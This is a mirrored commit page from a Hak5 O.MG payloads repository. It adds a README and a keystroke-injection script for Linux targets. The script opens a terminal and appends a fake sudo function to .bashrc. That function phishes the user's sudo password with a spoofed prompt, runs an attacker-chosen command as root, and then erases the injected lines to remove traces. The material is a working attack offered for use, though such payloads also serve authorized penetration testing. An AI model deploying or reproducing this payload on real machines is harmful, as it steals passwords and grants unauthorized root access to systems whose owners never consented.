hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #224 from simen64/New-payload_sudo-phisher 

New payload run command as root, without sudo passwod
pull/227/head
Kalani Helekunihi 2024-05-24 14:52:22 -04:00 committed by GitHub
parent 88d4d6010f 65b9e0de86
commit 7946403c26
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
2 changed files with 85 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

41
payloads/library/execution/run-command-as-root_without-sudo-password/README.md Normal file
View File

@ -0,0 +1,41 @@
# Run any command as root, without knowing the sudo password
A payload that allows for executing any bash command on the targets computer as root, without knowing their sudo password.
**Category:** Execution
## Description
This payload intercepts the .bashrc file so when the user uses `sudo` they type their password in our fake prompt letting us execute any command with root.
We also execute the targets original command, and remove our injection in the .bashrc file to remove traces.
## Getting started
### Dependencies
- Linux
- Bash
### Prerequisites
If your target uses Gnome, uncomment this line in the payload (uncomment by removing `REM_BLOCK` and `END_REM`:
```
REM_BLOCK
Use this if your targets DE is Gnome (remove REM_BLOCK and END_REM + this line)
ALT F2
DELAY 100
STRINGLN xterm
DELAY 500
END_REM
```
If your target uses a DE or WM that lets you open a terminal with ctrl-alt-t uncomment this line:
```
REM_BLOCK
Use this if your targets DE or WM has the ctrl-alt-t shortcut (remove REM_BLOCK and END_REM + this line)
CTRL-ALT t
DELAY 500
END_REM
```
## Settings
- #cmd what command to run as root, do not include `sudo`

44
payloads/library/execution/run-command-as-root_without-sudo-password/payload.txt Normal file
View File

@ -0,0 +1,44 @@
REM ###############################################
REM # |
REM # Title : Run command as root |
REM # Author : simen64 |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ###############################################
REM change to your keyboard layout
DUCKY_LANG NO
DELAY 2000
CAPSLOCK_DISABLE
REM put your command here (switch out apt update)
DEFINE #cmd apt update -y
REM_BLOCK
Use this if your targets DE is Gnome (remove REM_BLOCK and END_REM + this line)
ALT F2
DELAY 100
STRINGLN xterm
DELAY 500
END_REM
REM_BLOCK
Use this if your targets DE or WM has the ctrl-alt-t shortcut (remove REM_BLOCK and END_REM + this line)
CTRL-ALT t
DELAY 500
END_REM
REM inject the code
STRINGLN_BLOCK
echo '
sudo() {
while true; do
read -s -r -p "[sudo] password for ${USER}: " passwd
echo "${passwd}" | /usr/bin/sudo -S ${@} && { echo "${passwd}" | /usr/bin/sudo -S #cmd; head -n -6 .bashrc > temp && mv temp .bashrc; break; } >/dev/null 2>&1 || { clear; echo "Sorry, try again."; }
done
}' >> .bashrc
exit
END_STRINGLN